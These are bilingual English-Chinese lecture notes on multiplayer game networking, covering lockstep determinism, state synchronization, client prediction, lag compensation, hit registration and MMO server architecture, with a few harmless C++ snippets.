    As soon as the measured interactivity degree decreases below a given thresholdtake some procedure skips processing obsolete game events withthe aim of bringing back a satisfactory interactivity level.

    一旦测量的交互性降低到给定的阈值以下,一些程序就会跳过处理过时的游戏事件,以恢复令人满意的交互性水平。

    webp

    Deterministic Difficulties

    确定性难题

    • Deterministic

      确定性

      • The same input sequence need to produce the same game state on all machines

        相同的输入序列需要在所有机器上产生相同的游戏状态

    • Deterministic is Hard

      确定性很难

      • Floating point

        浮点型

      • Random number

        随机数

      • Containers and algorithms (sort, add, remove, etc.)

        容器和算法(排序、添加、删除等)

      • Math tools (vectors, quaternions, etc)

        数学工具(向量、四元数等)

      • Physics simulation (very difficult)

        物理模拟(非常困难)

      • Code logic execution order

        代码逻辑执行顺序

    webp

    Floating Point Numbers

    浮点数

    • Because of the computer binary, Thesenumbers can be accurately represented

      由于计算机二进制,这些数字可以被精确地表示出来

      • 0.5 = 1/2
      • 0.25 = 1/4
      • 0.75 = 1/2 + 1/4
      • 0.875 = 1/2 + 1/4 + 1/8
    • Such numbers can only be approximated

      这些数字只能近似表示

      • 2/3 ≈ 0.66…7

    webp

    • Floating point numbers must comply with the lEEE 754 standard

      浮点数必须符合 lEEE 754 标准


    • Floating point numbers conform to the lEEE 754standard

      浮点数符合 lEEE 754 标准

    • But different platforms may have different behavior

      但不同的平台可能有不同的行为


    Floating Point Hardware & OS Behaviour

    浮点硬件和操作系统行为

    • Intel / Amd

    • PS / Xbox

    • Windows / linux

    • Android / IOS


    Floating Point Compilers Behaviour

    浮点编译器行为

    • Math Library(sin、cosin、tan、exp、pow …)

      数学库(sin、cosin、tan、exp、pow…)

    • Third party components

      第三方组件

    • Different platforms

      不同的平台

    • Different versions

      不同版本

    • Different languages

      不同的语言


    Idea: Avoid problems on the precision boundary, customize the precision

    理念:避免精度边界问题,定制精度

    • Fixed-point math library

      定点数学库

    • Look-up table (trigonometric functions, etc.)

      查找表(三角函数等)

    • Amplification and truncation

      放大和截断

    Simple method

    简单的方法

    • Multiply by 1000, then divide by 1000, there is an overflow risk

      乘以 1000,然后除以 1000,存在溢出风险

    • The numerator and denominator are represented by fixed-point numbers (2/3)

      分子和分母由定点数(2/3)表示


    One Solution: Fixed point math

    一种解决方案:定点数

    A fixed-point number can be split into three parts

    一个定点数可以分成三部分

    • An optional sign bit

      可选符号位

    • An integer

      一个整数

    • A fractional part

      分数部分

    • Need to implement addition, subtraction, multiplication and division etd.

      需要实现加、减、乘、除等运算

    • Implement class, class methods

      实现类、类方法

    • Performance needs to be considered

      需要考虑性能

    webp

    $$V=(-1){b_{f+i}}(\sum_{n=0}{i}2{n}b_{n+f}+\sum_{m=1}{f}2^{-m}b_{f-m})$$

    Random Number

    随机数

    • Random problems in the game

      游戏中的随机问题

      • Trigger of random events, npc random birthplace

        随机事件触发,NPC 随机出生地

      • A random attribute of the attack, e.g. critical strike chance

        攻击的随机属性,例如暴击机会

    • These logics are generally implemented with random numbers

      这些逻辑通常用随机数实现

    • How to implement random logic that is completely consistent for multiple players

      如何为多个玩家实现完全一致的随机逻辑

    webp

    • Random numbers are pseudorandom

      随机数是伪随机的

    • Before the game starts, initialize the random number seed

      在游戏开始之前,初始化随机数种子

    • For different players’ clients, the number of random function calls is fixed, and the generated random numbers are the same

      对于不同玩家的客户端,随机函数调用的数量是固定的,生成的随机数是相同的

    webp

    int main() {
    std::default random engine e;
    std::uniform int distribution<int> u(0,100);
    e.seed(80);

    for(int i = 0; i < 20; i++) {
    std::cout << u(e) << std::endl;
    }

    return 0;
    }

    Deterministic Solution

    确定性解

    • Fixed-point numbers represent floating-point numbers in critical game logic

      定点数表示关键游戏逻辑中的浮点数

    • Deterministic random algorithm

      确定性随机算法

    • Deterministic containers and algorithms (sort, add, remove, etc.)

      确定性容器和算法(排序、添加、删除等)

    • Deterministic math tools (vectors, quaternions, etc.)

      确定性数学工具(向量、四元数等)

    • Deterministic physics simulation (very difficult)

      确定性物理模拟(非常困难)

    • Deterministic execution order

      确定性执行顺序

    webp

    Tracing and Debugging

    跟踪和调试

    Method of get checksum

    获取校验和的方法

    • All data checksum

      所有数据校验和

    • Key data checksum

      关键数据校验和

    • Other methods

      其他方法

    Automatically locate BUG

    自动定位 BUG

    • Server compares different client’s checksums

      服务器比较不同客户端的校验和

    • Client uploads 50 frames of full logs

      客户端上传 50 帧完整日志

    • Find inconsistencies in the compared logs

      查找比较日志中的不一致之处

    webp

    Lag and Delay

    延迟和延误

    • Client send operation

      客户端发送操作

    • Receive the operation of this frame from the server

      从服务器接收此帧的操作

    • execute

      执行

    Lag: Network is unstable. lf you wait until you receivenew frame, there will be a lag

    滞后:网络不稳定。如果你等到收到新帧,就会产生延迟

    Solution

    解决方案

    • use buffer to cache frames

      使用缓冲区缓存帧

      • Large buffer, large delay

        缓冲区大,延迟大

      • Small buffer, sensitive to lag

        小缓冲区,对延迟敏感

    webp

    Separating Game Logic from Rendering

    将游戏逻辑与渲染分离

    Lag problem

    滞后问题

    • Separation of logic and rendering

      逻辑与渲染的分离

    • Local client-side interpolation smoothing

      本地客户端插值平滑

    Frame rate

    帧率

    • The logical frame rate is generally 10~30 frames

      逻辑帧率一般为 10~30 帧

    • The rendering frame rate is generally higher

      渲染帧率通常较高

    webp

    Advantage

    优势

    • Different frequencies, independent operation

      不同频率,独立运行

    • Rendering separation to avoid tearing and freezing

      渲染分离以避免撕裂和冻结

    • Rendering freezes, does not affect the operation of logical frames

      渲染冻结,不影响逻辑帧的操作

    • Servers can run logic frames to solve some cheating problems

      服务器可以运行逻辑框架来解决一些作弊问题

    • If the server runs logical frames, it can save key frame snapshots to speed up reconnection

      如果服务器运行逻辑帧,它可以保存关键帧快照以加快重新连接

    Reconnection Problem

    重新连接问题

    • Offline

      离线

    • Reconnect

      重新连接

    • Catch up

      赶上

    webp

    Client Game State Snapshots

    客户端游戏状态快照

    • Snapshots can be saved regularly on the local client and serialized to disk

      快照可以定期保存在本地客户端上并序列化到磁盘

    • When reconnection occurs, restore thegame state from the disk serialized data

      重新连接时,从磁盘序列化数据还原游戏状态

    • Server sends player commands after snapshot

      服务器在快照后发送玩家命令

    • Accelerate to catch up with the game progress

      加速以赶上游戏进度

    webp

    Quick Catch Up

    快速赶上

    How to catch up?

    如何迎头赶上

    • In the sample code, chasing 10 frames each time

      在示例代码中,每次追踪 10 帧

    • If originally 10 frames per second, when chasing frames, it may run 100 frames per second

      如果最初每秒 10 帧,在追逐帧时,它可能每秒运行 100 帧

    float m_delta = 0;
    float m_tick_delta = 100;
    void CBattleLayer::update(float delta) {
    // do something
    m_delta += delta;
    int exec_count = 1;
    while(m_delta >= m_tick_delta) {
    m_delta -= m_tick_delta;
    // logic frame
    if(!logicUpdate(LOGIC_TIME)) {
    return;
    }
    // catch up 10 frames at a time
    if(exec_count++ >= 10){
    break;
    }
    }
    // do something
    }

    Server State Snapshot Optimization

    服务器状态快照优化

    • The server runs logical frames and saves snapshots of keyframes

      服务器运行逻辑帧并保存关键帧的快照

    • The server sends the snapshot, and the player commands after the snapshot

      服务器发送快照,玩家在快照后发出命令

    • Accelerate to catch up with the game progress

      加速以赶上游戏进度

    webp

    Temporary Offline, No Crash

    暂时离线,无崩溃

    • Client also keeps game state, keyframes, deterministic-timed frames

      客户端还保留游戏状态、关键帧、确定性定时帧

    • After reconnecting, the server sends commands to the dropped player

      重新连接后,服务器向被删除的播放器发送命令

    • Accelerate to catch up the game progress

      加速以赶上游戏进度

    webp

    Observing

    观察

    Watching other players playing the game

    观看其他玩家玩游戏

    • Reconnecting and watching are essentially the same

      重新连接和观看基本上是一样的

    • Watching is similar to reconnecting after a client crash

      监视类似于在客户端崩溃后重新连接

    • Player action command, forwarded to the player watching the game

      玩家动作命令,转发给观看游戏的玩家

    • Watching is usually delayed for a few minutes to prevent screen peeping

      观看通常会延迟几分钟,以防止偷看屏幕

    webp

    Replay

    重播

    Execute player commands in order which can speed up

    按照可以加速的顺序执行玩家命令

    • Replay file

      回放文件

      • Save game commands for a game

        保存游戏命令

      • Files take up little space

        文件占用的空间很小

    • How to implement go back?

      如何实施回退?

      • When the client executes the replay file, it adds a key frame snapshot, which can go back to the key frame moment

        当客户端执行回放文件时,它会添加一个关键帧快照,该快照可以返回到关键帧时刻

      • The current version of Honor of Kings go back to the key frame before 60s

        当前版本的《王者荣耀》回退了 60s 的关键帧

    webp

    Lockstep Cheating lssues

    锁步作弊问题

    Multiplayer-PVP

    多人 PVP

    • Game over

      游戏结束

      • The client uploads the key data checksum, the server verifys the game result

        客户端上传密钥数据校验和,服务器验证游戏结果

    • During the game

      在游戏过程中

      • Report the key data checksum

        报告密钥数据校验和

      • Cheating players are kicked out, etc.

        作弊的玩家被踢出等等。

    webp

    2 Players

    2 名玩家

    • Server can not detect who is cheating using key data checksum

      服务器无法使用密钥数据校验和检测谁在作弊

    • If the server is not verified, the cheating player will only affect one player in this case

      如果服务器未经验证,作弊玩家在这种情况下只会影响一个玩家

    webp

    • Difficult to avoid third-party plug-in to access war-fog or other hidden data

      难以避免第三方插件访问战争迷雾或其他隐藏数据

      • Game logic is performed on the client side

        游戏逻辑在客户端执行

      • Clients have all the game data

        客户端拥有所有游戏数据

    webp

    Lockstep Summary

    锁定步骤摘要

    Advantages

    优势

    • Low bandwidth, only sends commands

      带宽低,只发送命令

    • High development efficiency, similar to single-player game development

      开发效率高,类似单人游戏开发

    • Precise action/hit detection

      精确的动作/命中检测

    • Easy to record games

      易于录制游戏

    Problems

    问题

    • Maintain the consistency is difficult to achieve

      保持一致性很难实现

    • Hard to solve the cheat plugin to unveil all game states

      难以解决的作弊插件揭示所有游戏状态

    • Longer disconnection and reconnection time

      更长的断开和重新连接时间

      • Need more complex optimization

        需要更复杂的优化

    State Synchronization

    状态同步

    webp

    Replication Protocol of Halo

    Halo 的同步协议

    webp

    State DataEventsControl Data
    Guaranteed eventual delivery of most current state
    保证最终交付最新状态
    - Object position
    对象位置
    - Object health
    对象生命
    - 150+ properties
    150+ 个属性
    Unreliable notifications of transient occurrences
    不可靠的瞬态事件通知
    - Please fire my weapon
    请发射我的武器
    - This weapon was fired
    此武器已被发射
    - Projectile detonated
    弹丸被引爆
    -More events
    更多事件
    High-frequency, the best-effort transmission of rapidly-updated data extracted from player control inputs
    高频、尽最大努力传输从玩家控制输入中提取的快速更新数据
    - Current analog stick values for all players
    所有玩家的当前模拟棒值
    - Current position of client’s own biped
    客户端自己的角色的当前位置
    -More properties
    更多属性

    State

    状态

    • The game state is necessary to represent the game world. e.g: HP, MP

      游戏状态是代表游戏世界所必需的。例如:血量、法力

    State Synchronization

    状态同步

    • Server does not generate a single update for all clients. lt sends client a customized data packet

      服务器不会为所有客户端生成单个更新。它向客户端发送自定义数据包

    • lf the game world is too complex, you can set an Area Of Interest (AOl) for reducing server overhead

      如果游戏世界太复杂,您可以设置一个兴趣区域(AOl)来减少服务器开销

    Server Authorizes the Game World

    服务器授权游戏世界

    Server

    服务器

    • Game world is authorized

      游戏世界已授权

    • Receive input and state from client

      从客户端接收输入和状态

    • Run game logic

      运行游戏逻辑

    • Send state

      发送状态

    Client

    客户端

    • Receive data and simulate game world

      接收数据并模拟游戏世界

    • Game play improvement

      游戏玩法改进

    webp

    Authorized and Replicated Clients

    授权和同步客户端

    Authorized (1P)

    授权(1P)

    • Player’s local game client

      玩家的本地游戏客户端

    Server

    服务器

    • Authorized server

      授权服务器

    Replicated (3P)

    已同步(3P)

    • Simulated character in other player’s client

      其他玩家客户端中的模拟角色

    webp

    State Synchronization Example

    状态同步示例

    Player1 (Authorized)

    玩家 1(授权)

    • Fire

      开火

    Player2 (Replicated)

    Player2(已同步)

    • See player1 open fire

      看到玩家 1 开火


    Player 1 presses an input on their local machine to fire

    玩家 1 按下本地机器上的输入进行射击

    Player1 (Authorized)

    玩家 1(授权)

    • Fire

      开火

    • Send to server

      发送到服务器

    Server

    服务器

    • Player1 fire

      玩家 1 开火

    • Send to each client

      发送给每个客户端

    Player2 (Replicated)

    玩家 2(已同步)

    • Recieve packet

      接收数据包

    • Player1 fire

      Player 1 开火


    Server

    服务器

    Tell each client to replicate the movement of Player 1’s projectile.

    告诉每个客户同步玩家 1 投射物的运动。


    Server

    • Tell each client to destroy their copies of Player 1’s projectile

      告诉每个客户销毁他们的玩家 1 投射物副本

    • Tell all clients to response to damage of the projectile

      告诉所有客户对弹丸的损坏做出反应

    Dumb Client Problem

    哑巴客户端问题

    Clients can not to do anything until receive server state update

    在收到服务器状态更新之前,客户端无法执行任何操作

    How to see an immediate response?

    如何看到即时响应?

    • Client-side prediction

      客户端预测

    • Server reconciliation

      服务器对账

    webp

    Client-Side Prediction

    客户端预测

    Authorized client

    授权客户

    • Press “→”

      按“→”

    • Received server message

      收到服务器消息

    • Start movement

      开始移动

    webp

    Overwatch - Client-side Prediction

    守望先锋-客户端预测

    • RTT = 160ms

      RTT = 160 毫秒

    • Half RTT = 80ms

      半 RTT = 80 毫秒

    • Command frame = 16ms

      命令帧 = 16ms

    The client is always ahead of the server by half RTT and one buffered command frame

    客户端始终领先于服务器一半的 RTT 和一个缓冲命令帧

    • Press key and response immediately

      按键并立即响应

    webp

    Server Reconciliation

    服务器对账

    Authorized client: Buffer

    授权客户:Buffer

    • Record every state when do the client prediction

      在进行客户端预测时记录每个状态

    • Compare with the past server data when it was received on client side

      与客户端接收到的过去服务器数据进行比较


    Ring buffer for states

    状态环形缓冲区

    • Stores all of our states in the past several frames on client

      将过去几帧中的所有状态存储在客户端上

    Process

    流程

    • If the client computed the same result as server, the client will continue on its merry way to simulate the next input

      如果客户端计算出的结果与服务器相同,客户端将继续愉快地模拟下一个输入

    Problem

    问题

    • lf misprediction?

      如果预测失误?

    webp


    • If blocked by an obstacle at the server

      如果被服务器上的障碍物阻挡

    • Position is wrong! (in red)

      位置不对!(红色)

    • Client must accept the new server

      客户端必须接受新服务器

    • update

      更新

    • Retrace all predicted movement starting from the new confirmed position

      从新的确认位置开始回溯所有预测的运动

    webp


    • If the client and server disagree on the results, we’ve mispredicted

      如果客户端和服务器对结果不一致,我们就预测错了

    • Have to reconcile

      必须和解

    Ring buffer for inputs

    用于输入的环形缓冲区

    • Stores all of inputs we did in the past several frames on client.

      在客户端上存储我们在过去几帧中所做的所有输入。

    Process

    流程

    • Overwrite the clients results withthe server’s results

      用服务器的结果覆盖客户端的结果

    • Replay all of your inputs to catchback up to what you believe now

      重播您的所有输入,以回溯您现在所相信的内容

    webp

    Server Reconciliation Example

    服务器对账示例

    Overwatch

    守望先锋

    • We try to move

      我们试图移动

    • The server said no

      服务器拒绝了

    • We got yanked back down to where we were before and froze

      我们被拉回到原来的位置,然后僵住了

    webp

    Packet Loss

    数据包丢失

    • Client input packages fail to reach the server

      客户端输入包无法到达服务器

    • The server tries to keep tiny input buffer of unprocessed input

      服务器试图保留未处理输入的微小输入缓冲区

    • lf the server run out of input buffer, server will duplicate your last input in a window

      如果服务器的输入缓冲区用完,服务器将同步您在窗口中的最后一个输入

    • Push client sends missed inputs asap

      推送客户端尽快发送丢失的输入

    webp

    State Synchronization Vs. Lockstep Synchronization

    State Synchronization
    状态同步
    Lockstep Synchronization
    锁步同步
    Deterministic logic
    确定性逻辑
    Not necessary
    不需要
    Necessary
    必要的
    Response
    响应
    Better responsiveness
    更好的响应能力
    Poor responsiveness
    响应性差
    Network Traffic
    网络流量
    Usually high
    通常高
    Usually low
    通常低
    Development efficiency
    开发效率
    Much more complicated
    要复杂得多
    Easy to develop, difficult to Debug
    易于开发,难以调试
    Number of players
    玩家数量
    Few players
    玩家很少
    Support small and large numbers of players
    支持小型和大型玩家
    Cross-platform
    跨平台
    Relatively easy
    相对容易
    Relatively difficult
    相对困难
    Reconnect
    重连
    Relatively easy
    相对容易
    Relatively difficult
    相对困难
    Replay File size
    重播文件大小
    Big
    Small
    Cheat
    欺骗
    Relatively hard
    相对困难
    Relatively easy
    相对容易

    References

    Network Protocols

    Network Synchronization

    第十九节:网络游戏的进阶架构

    Online Gaming Architecture - Advanced Topics

    Character Movement Replication

    角色动作同步

    Character Movement Replication

    角色动作同步

    From player 2’s point of view, player1’s movement is very choppyand lags behind player1’s actual position.

    从玩家 2 的角度来看,玩家 1 的动作非常不稳定,落后于玩家 1 的实际位置。

    Interpolation & Extrapolation

    内插值和外插值

    Purpose: Smooth movementof player’s characters on screen

    目的:玩家角色在屏幕上流畅移动

    Interpolation

    内插值

    • Calculate the state between old butknown states

      计算旧但已知状态之间的状态

    webp

    Extrapolation

    外插值

    • Predict where entity is going from old states

      预测实体从旧状态走向何方

    webp

    Smooth States by Interpolations

    插值平滑状态

    • Position and Orientationcan be interpolated between two recently received data

      位置和方向可以在最近接收到的两个数据之间进行插值

    Buffer States and Deferred Render

    缓冲区状态和延迟渲染

    • Data packet will not be rendered immediately when received

      数据包在收到后不会立即呈现

    • Put into memory and wait for a new data packet

      放入内存并等待新的数据包

    • After waiting for a time offset, start to render first received data packet

      等待时间偏移后,开始渲染第一个接收到的数据包

    • Create an artificial delay of interpolation offset

      创建插值偏移的人工延迟

    webp

    Character Movement Replication by Interpolation

    通过插值同步角色动作

    Result after interpolation was implemented

    插值后的结果

    Interpolation Challenges of Vehicle Movement Replication

    车辆运动同步的插值挑战

    webp

    Estimate Current State by Extrapolation

    通过外推法估计当前状态

    • Use paststates to estimate currentstate to compensate net lag

      使用过去状态来估计当前状态,以补偿净滞后

    Dead Reckoning

    死亡清算

    • Estimate future state based on states that have been received

      根据已收到的状态估计未来状态

    webp

    Projective Velocity Blending

    投影速度混合

    • At $t_0$, the replicated character is at $p_0$ with velocity $v_0$ and acceleration $a_0$, and receive the
      synced states with position $p’_0$, velocity $v’_0$, acceleration $a’_0$

      在时间 $t_0$,同步的角色位于 $p_0$,其速度为 $v_0$,加速度为 $a_0$,并接收到同步的状态,其位置为 $p’_0$,速度为 $v’_0$,加速度为 $a’_0$。

    • We can predict position $p’_t$ after a time duration $t$ based the synced states

      我们可以根据同步的状态预测在时间持续 $t$ 后的位置 $p’_t$。

    $$p’_t=p’_0+v’_0t+\frac{1}{2}a’_0t^2$$

    • Our goal is to reach $p’t|{t=t_B}$ smoothly after $a$ fixed blending time duration: $t_B-t_0$

      我们的目标是在固定的混合时间持续 $t_B - t_0$ 后平滑地到达 $p’t |{t=t_B}$。

    webp

    At any time $t$, we can get the blending velocity $v_t$

    在任何时刻 $t$,我们可以得到混合速度 $v_t$

    $$\lambda=\frac{t-t_0}{t_B-t_0}$$

    $$v_t=v_0+\lambda(v’_0-v_0)$$

    And projecting the position $p_t$ from $p_0$

    并从 $p_0$ 投影位置 $p_t$

    $$p_t=p_0+v_tt+\frac{1}{2}a’_0t^2$$

    Then get the dead reckoned position $p_d$ by combining $p_t$ and $p’_t$

    然后通过结合 $p_t$ 和 $p’_t$ 得到估算位置 $p_d$

    $$p_d=p_t+\lambda(p’_t-p_t)$$

    webp

    Collision Issues

    碰撞问题

    Dead reconking Collision trajection looks weird

    估算碰撞轨迹看起来很奇怪

    Phase 1: Collision starts

    **第一阶段:**碰撞开始

    Phase 2: The replica keeps going, since the extrapolation is basedon the last snaphsot

    **第二阶段:**同步继续进行,因为外推是基于最后一次快照

    Phase 3: Finally we receive a snapshot to stop the replica, but replica gives master’s rigidbody a huge velocity to pushing master away

    **第三阶段:**最后我们收到一个快照来停止同步,但同步会给主体的刚体以巨大的速度将主体推开

    Physics Simualtion Blending During Collision

    碰撞过程中的物理模拟混合

    Tunable between two states

    可在两个状态之间调整

    • State calculated by the client physics simulation

      客户端物理模拟计算的状态

    • State that tries to reach the dead reckoned positions

      试图到达指定位置

    webp

    Tuned blending factors from Watch Dogs 2, Ubisoft Toronto. Bikes recover faster than cars

    调整了育碧多伦多《看门狗 2》的混合因子。自行车的恢复速度比汽车快。

    Usage Scenario of Interpolation

    插值使用场景

    Scenario for Using Interpolation

    使用插值的场景

    • Characters’ movement are very non-deterministic with high acceleration

      角色在高加速度下的运动非常不确定

    • Gameplay suffers from the “wrap”when extrapolation errors occur

      当出现外推错误时,游戏玩法会受到“包装”的影响

    Typical examples

    典型示例

    • FPS
    • MOBA

    webp

    Usage Scenario of Extrapolation

    外推法使用场景

    Scenario for Using Extrapolation

    使用外推法的场景

    • Player movement uses a realistic physical model

      玩家动作使用逼真的物理模型

    • Gameplay suffers from latency due to network transmission

      游戏因网络传输而延迟

    Typical examples

    典型示例

    • Racing game. Vehicle systems (Tanks, Ships, etc.)

      赛车游戏。载具系统(坦克、船舶等)

    webp

    Blend Scenario of Interpolation and Extrapolation

    插值和外推的混合场景

    Sometimes we need to apply both interpolation and extrapolation for the game to work properly

    有时我们需要同时应用插值和外推法才能使游戏正常工作

    • Apply Extrapolation on vehicles

      对车辆应用外推法

    • Apply Interpolation for characters

      对角色应用插值

    • Do extrapolation if not enough data received

      如果没有收到足够的数据,则进行外推

    webp

    Hit Registration

    点击注册

    How to Make a Headshot in Online Game

    如何在网络游戏中进行头部射击

    Net messages to travel from client to server, and interpolation causes you to see the enemy way lag behind

    网络消息从客户端传输到服务器,插值会导致你看到敌人的方式落后

    webp

    Where is the Enemy?

    敌人在哪里?

    Due to latency, interpolation offsetand time delay, you’ll see other players slightly behind their current server positions. Where should I shot?

    由于延迟、插值偏移和时间延迟,你会看到其他玩家稍微落后于他们当前的服务器位置。我应该在哪里开枪?

    Where Should I Shot?

    我应该在哪里开枪?

    webp

    Hit Registration

    点击注册

    Hit registrationis making a consensusof all players that whether you’ve actually hit your enemy

    命中注册是让所有玩家就你是否真的击中了敌人达成共识。

    webp

    • Detecting hit event on client-side with replicated character positions

      通过同步角色位置在客户端检测命中事件

    • Send hit events to the server

      将命中事件发送到服务器

    • Server run simple verification

      服务器运行简单验证

    webp

    A Comparison of HitscanWeapons versus Projectile Weapons

    Hitscan 武器与投射武器的比较

    Unlike hitscanweapons, projectile weapons can also simulate the effect of gravity

    与 hitscanweapons 不同,投射式武器还可以模拟重力的影响

    webp

    《战地》中的风景是由几个 hitbox 构建的,因此破坏可以带走墙壁、地板等。

    webp

    • Hitscan 发射射弹后立即击中目标
    • Projectile 发射射弹后需要一定时间才可击中目标

    A Very Simple Server Verification of Hit Event

    一种非常简单的服务器命中事件验证

    • Client send hit event with complete ray information to server

      客户端向服务器发送包含完整射线信息的命中事件

      • StartPoint, HitPointand HitObjectof the Raycast

        光线投射的起点、终点和终点

    • Validate StartPointwhether is really close enough to shooter

      验证起点是否真的足够接近射击者

    • Validate the HitPointwhether is really belong to HitObject

      验证 HitPoint 是否真的属于 HitObject

    • Ensure nothing is blocking along the path by casting a ray from the StartPointand HitPoint

      通过从起点和终点投射光线,确保路径上没有任何遮挡

    In real game, the server verification is VERY TRICKY AND COMPLICATED

    在真实游戏中,服务器验证非常棘手和复杂

    Server Verification Has to Guess

    服务器验证必须猜测

    webp

    Problem of Client-Side Hit Detection

    客户端命中检测问题

    Efficient and Precise

    高效精准

    • Very efficient for hit detection without huge server workload

      非常有效的命中检测,无需巨大的服务器工作负载

    • Best shooting experience with pixel precision

      像素精度最佳的拍摄体验

    Unsafe for cheating

    易于玩家作弊

    • Fake hit event message

      假热门事件消息

    • Lag switches

      滞后开关

    • Infinite ammo

      无限弹药

    Detecting Hit on Server-Side?

    检测服务器端的命中?

    Client doesn’t know the target current location on server

    客户端不知道服务器上的目标当前位置

    webp

    Lag Compensation

    滞后补偿

    Server-side state rewinding to compensate network lags when player’s commands are executed

    服务器端状态倒带,以补偿执行玩家命令时的网络延迟

    • Get information from clients

      从客户那里获取信息

    • Rewind game state in cached state snapshots that matches the client’s action time

      在与客户端操作时间匹配的缓存状态快照中回放游戏状态

    • Run client operation in rewind game state

      在倒带游戏状态下运行客户端操作

    webp

    Compensate all Possible Lags

    补偿所有可能的延迟

    • RewindTime = Current Server Time - Packet Latency - Client View Interpolation Offset

      RewindTime = 当前服务器时间 - 数据包延迟 - 客户端视图插值偏移

    webp

    webp

    Actor: Enemy’s client state

    角色:敌人的客户端状态

    Red collision box: Enemy in the player’s view

    红色碰撞框:玩家视野中的敌人

    Blue collision box: Rewinded server state

    蓝色冲突框:倒带服务器状态

    Cover Problems –Running into Cover

    掩体问题——遇到掩体

    webp

    被击中者躲到掩体后因为网络延迟仍被击中,Shooter’ s advantage.

    Cover Problems –Coming out from Cover

    webp

    被攻击者从掩体出来因网络延迟未被击中,Peeker’s advantage.

    Startup Frames to Ease Latency Feeling

    启动框架缓解延迟感

    • A fixed animation before attack or move can also eliminate the effect of lag from network transmission

      攻击或移动前的固定动画(技能前摇)也可以消除网络传输延迟的影响

    • Players will keep their attention on animations and ignore the state delay

      玩家将注意力集中在动画上,忽略状态延迟

    webp

    Local Forecast VFX Impacts

    本地预测 VFX 影响

    • Clients can perform local hit tests in order to give the player some instant feedback, such as displaying a blood splatter visual effect

      客户端可以执行本地命中测试,以便为玩家提供一些即时反馈,例如显示血溅的视觉效果

    • However, any permanent effects of the hits, such as reducing the hit points of a player, are only applied after receiving confirmation from the server

      但是,只有在收到服务器的确认后,才会应用命中的任何永久效果,例如减少玩家的命中点

    MMOG Network Architecture

    MMOG 网络架构

    What is MMOG?

    什么是 MMOG?

    MMOG: Massively Multiplayer Online Game, or more commonly MMO

    MMOG:大型多人在线游戏,或更常见的 MMO

    MMOs with a large numbers of players, often hundreds or thousands, on the same server can enable players to cooperate and compete with each other on a large scale, and include a variety of gameplay types (MMORPG, MMORTS, MMOFPS, etc.)

    在同一台服务器上拥有大量玩家(通常是数百或数千人)的 MMO 可以使玩家能够大规模地相互合作和竞争,并包括各种游戏类型(MMORPG、MMORTS、MMOFPS 等)

    webp

    webp

    Diversities of Modern MMO

    现代 MMO 的多样性

    webp

    Game Sub-Systems

    游戏子系统

    MMOs have a variety of gameplay and are supported by many sub-systems

    MMO 具有多种游戏玩法,并得到许多子系统的支持

    • User management

      用户管理

    • Matchmaking

      配对

    • Trading system

      交易系统

    • Social system

      社会制度

    • Data storage

      数据存储

    MMO Architecture

    MMO 架构

    webp

    链路层服务

    Login Server

    登录服务器

    • Verification of client connection

      客户端连接验证

    Gateway

    网关

    • Very important layer to separate inside/outside networks

      分隔内部/外部网络的非常重要的层

    webp

    Lobby

    大厅

    • Players can gather in the lobby, see and interact with other players

      玩家可以聚集在大厅,观看并与其他玩家互动

    • When the number of players continues to increase, it is a challenge to the performance of the server and the client

      当玩家数量持续增加时,服务器和客户端的性能都会受到挑战

    webp

    Character Server

    角色服务器

    All player data is managed in one system. Such as account info, character info, backpack info, mail info, etc.

    所有玩家数据都在一个系统中管理。如账户信息、人物信息、背包信息、邮件信息等。

    webp

    Trading System

    交易系统

    • Buying and selling items on the marketplace

      在市场上买卖商品

    • Sending items or coins to other players through the in-game Mail

      通过游戏内邮件向其他玩家发送物品或硬币

    • Game designers need to keep an eye on market prices to prevent imbalances

      游戏设计师需要关注市场价格,以防止不平衡

    • For a persistent world to maintain a stable economy, a balance must be struck between currency sources and sinks

      为了使世界保持稳定的经济,必须在货币来源和汇之间取得平衡

    • Players can use real-world money to buy a specific in-game item

      玩家可以用现实世界的钱购买特定的游戏内物品

    webp

    Social System

    社会制度

    • Player-to-player interplay and communication

      玩家之间的互动和沟通

    • Foster stronger social cohesion in-game

      在游戏中培养更强的社会凝聚力

    webp

    Matchmaking

    配对

    • You have to consider attributes like skills, level, latency, wait time…

      你必须考虑技能、级别、延迟、等待时间等属性…

    • Ingeneral, makingagood matchmaking service is core for a game design

      一般来说,提供良好的配对服务是游戏设计的核心

    • Running this on a global scale for your player population presents a whole different set of challenges

      在全球范围内为您的玩家群体运行此功能会带来一系列完全不同的挑战

    webp

    Data Storage

    数据存储

    The game data is very complex and diverse

    游戏数据非常复杂和多样化

    • Player data (guilds, dungeons, warehouse, etc.)

      玩家数据(公会、地下城、仓库等)

    • Monitoring data

      监测数据

    • Mining data

      最小化数据

    Data needs to be securely persisted and efficiently organized for retrieved and analysis etc.

    数据需要安全地持久化,并有效地组织起来进行检索和分析等。

    webp

    Relational Data Storage

    关系数据存储:MySQL

    • Requires Structure to be Predetermined

      需要预先确定结构

    • Flexible Queries

      灵活的查询

    • Always Consistent

      始终保持一致

    Game Development Examples

    游戏开发示例

    • Player Data

      玩家数据

    • GameData

      游戏数据

    • Inventory

      库存

    • ItemShops/Trading

      商品商店/贸易

    Non-Relational Data Storage

    非关系数据存储:MongoDB

    • Structure Can Change For Each Entry

      每个条目的结构都可能发生变化

    • Queries Have Higher Specificity

      查询具有更高的特异性

    • May Not Always Be Consistent

      可能并不总是一致的

    Game Development Examples

    游戏开发示例

    • Player/Item Stats/Profile Game Data

      玩家/物品统计/个人资料游戏数据

    • Enchantments and Upgrades

      魔法和升级

    • Game States

      游戏状态

    • Quest Data

      任务数据

    In-Memory Data Storage

    内存数据存储:redis

    • Extremely Fast (Memory versus Hard Disk)

      极快(内存与硬盘)

    • Key-Value

      关键价值

    • Fast Sorted/Ranged Searches

      快速排序/范围搜索

    • Persistence among servers

      服务器间的持久性

    Game Development Examples

    游戏开发示例

    • Matchmaking

      配对

    • Leaderboards

      排行榜

    • Session Management

      会话管理

    • Boost Performance For Other Databases

      提高其他数据库的性能

    Player Number Growth

    玩家数量增长带来的服务器负担

    webp

    Distributed System

    分布式系统

    A distributed system is a computing environment in which various components are spread across multiple computers (or other computing devices) on a network

    分布式系统是一种计算环境,其中各种组件分布在网络上的多台计算机(或其他计算设备)上

    webp

    Challenges with Distributed systems

    分布式系统的挑战

    • Data access mutual exclusion

      数据访问互斥

    • Idempotence

      意识

    • Failure and partial failure

      故障和部分故障

    • Unreliable network

      不可靠的网络

    • Distributed bugs spread epidemically

      分布式漏洞以流行病的方式传播

    • Consistency and consensus

      一致性和共识

    • Distributed transaction

      分布式事务

    Load Balancing

    负载平衡

